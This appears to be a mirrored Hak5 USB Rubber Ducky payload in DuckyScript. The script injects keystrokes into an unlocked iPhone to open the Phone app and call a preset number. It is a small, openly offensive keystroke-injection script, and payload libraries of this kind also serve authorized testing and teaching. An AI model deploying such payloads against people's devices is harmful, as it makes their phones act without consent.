Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
3018 views
1
REM ##############################################
2
REM # |
3
REM # Title : Call Someone On An iPhone |
4
REM # Author : Aleff |
5
REM # Version : 1.0 |
6
REM # Category : Execution |
7
REM # Target : iPhone |
8
REM # |
9
REM ##############################################
10
11
12
REM Requirements:
13
REM - The phone must be unlocked
14
15
REM Tested on:
16
REM - iPhone 14
17
REM - iOS 16.4.1
18
19
REM You need to change the name of the application according to the language you have on your phone.
20
DEFINE #PHONE-APP-NAME example
21
REM You must set the phone number to be called
22
DEFINE #NUMBER example
23
24
GUI SPACE
25
DELAY 300
26
STRING #PHONE-APP-NAME
27
ENTER
28
DELAY 1000
29
BACKSPACE
30
STRING #NUMBER
31
DELAY 500
32
ENTER
33
34